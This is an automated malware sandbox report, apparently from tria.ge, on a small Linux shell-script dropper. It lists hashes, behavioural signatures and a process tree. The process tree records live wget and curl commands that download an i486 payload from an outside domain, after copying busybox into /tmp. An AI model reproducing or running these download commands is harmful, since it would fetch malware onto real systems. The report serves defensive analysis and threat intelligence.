Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
15/07/2024, 14:32
Static task
static1
Behavioral task
behavioral1
Sample
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
-
Size
2KB
-
MD5
1ffa7d5e3a236cf0d6981d07e1b90406
-
SHA1
9bdae03e2410b108144841c466d1e769fea3a9ce
-
SHA256
69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4
-
SHA512
6f2aea4615c2f2cf06fc7dd92d9dd24f8b79d3a89d9fb17a35dcd9170ed12f7b5c238ee64b99dfd19686cdccfca62580a4285cedbad11e4cc39315e0f8bba284
Malware Config
Signatures
-
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/filesystems cp -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/busybox cp
Processes
-
/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh1⤵PID:1504
-
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1505
-
-
/usr/bin/wgetwget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i4862⤵PID:1506
-
-
/usr/bin/curlcurl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i4862⤵PID:1510
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5b4dede5fc0b1bad5cb8e901bde126b97
SHA110cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA51245665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6